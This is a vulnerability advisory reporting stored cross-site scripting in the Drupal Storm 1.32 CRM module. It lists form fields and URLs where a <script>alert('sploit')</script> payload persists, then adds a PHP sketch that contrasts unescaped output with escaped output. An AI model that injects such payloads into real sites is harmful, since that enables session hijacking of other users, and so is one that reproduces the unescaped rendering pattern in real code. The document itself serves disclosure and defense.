Drupal Storm 1.32 Cross Site Scripting

2010-05-14T00:00:00
ID PACKETSTORM:89550
Type packetstorm
Reporter Black Packeteer
Modified 2010-05-14T00:00:00

Description

                                        
                                            `Drupal Storm module is a CRM type module that allows you to make orgs,  
people, tasks, and project. It is used on thousands of sites according to  
http://drupal.org/project/usage/storm. Storm version 1.32 have a lots of  
cross site scripting vulns.  
  
Sploits -  
* Make or view a Storm organization at ?q=node/add/stormorganization  
* <script>alert('sploit');</script> for the Fullname, address, city, state,  
phone, and taxid values  
* Save and watch scripts  
  
* Make new person, ?q=node/add/stormperson  
* <script>alert('sploit');</script> for the Name, enter and save it  
* Make new project at ?q=node/add/stormproject, use anything and save  
* Make new task at ?q=node/add/stormtask using this:  
* <script>alert('sploit');</script> for Step no. and Title  
* Go at ?q=node/add/stormticket  
* Change twice the 'Project:' drop-down to see js alerts  
  
* Make new ticket at ?q=node/add/stormticket  
* Go to Timetracking screen at ?q=node/add/stormtimetracking  
* Change the 'Project:' drop-down to view alerts  
`
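
Stored values like the ones above stay inert when they are escaped at the point where they are printed. The sketch below is an added example, not code from the Storm module: the function names and sample data are hypothetical, and htmlspecialchars() is used directly as a stand-in for Drupal's check_plain().

```php
<?php
// Added example: a simplified sketch, not the Storm module's code.
// All function names here are hypothetical.

// Constructed sample of a stored organization node, as a user could have saved it.
$organization = array(
  'fullname' => "<script>alert('sploit');</script>",
);

// Constructed sample of stored task titles keyed by node id.
$task_titles = array(
  7 => "<script>alert('sploit');</script>",
  8 => 'Write "Q2" report',
);

// Escape a plain-text value for use in HTML element content or attributes.
// Drupal's check_plain() applies htmlspecialchars() in the same way.
function example_plain($text) {
  return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
}

// Vulnerable pattern: the stored value is concatenated into markup as-is,
// so the browser parses it as HTML and runs the script.
function example_render_unsafe(array $org) {
  return '<div class="fullname">' . $org['fullname'] . '</div>';
}

// Hardened pattern: the stored value is escaped when it is printed.
function example_render_safe(array $org) {
  return '<div class="fullname">' . example_plain($org['fullname']) . '</div>';
}

// Drop-down options built from stored titles need the same treatment,
// for both the value attribute and the visible label.
function example_options_safe(array $titles) {
  $html = '';
  foreach ($titles as $id => $title) {
    $html .= '<option value="' . example_plain($id) . '">'
           . example_plain($title) . "</option>\n";
  }
  return $html;
}

echo example_render_unsafe($organization), "\n";
echo example_render_safe($organization), "\n";
echo example_options_safe($task_titles);
```

Escaping belongs on every path that prints a user-supplied field, including responses that page scripts use to refill a drop-down.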